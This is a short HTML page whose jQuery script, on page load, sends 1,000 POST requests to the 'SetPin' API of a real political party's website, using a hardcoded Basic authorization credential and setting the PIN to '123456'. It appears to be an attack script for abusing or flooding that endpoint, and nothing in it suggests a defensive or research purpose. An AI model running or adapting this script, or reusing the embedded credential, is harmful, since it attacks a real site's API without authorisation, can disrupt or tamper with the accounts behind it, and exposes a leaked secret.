<script type="text/javascript" src="https://code.jquery.com/jquery-2.1.4.min.js"></script>
<script>
$(document).ready(function()
{
	console.log("hello")
for(var i=0;i<1000;i++)
{


$.ajax({
    url: "https://janasenaparty.org/api/SetPin", 
     headers: {
        'Authorization':'Basic SlNQNTk5NDIwMTY6czF6T1p0ZjlFWE54NU9DWjBQb0dzZz09',
        
        'Content-Type':'application/json'
    },
    type: "POST",
    contentType: "application/json",
    data: JSON.stringify({'Pin': '123456'}),
    success: function( data ) { 
        

        console.log(data);
    }   
});
}
})
</script>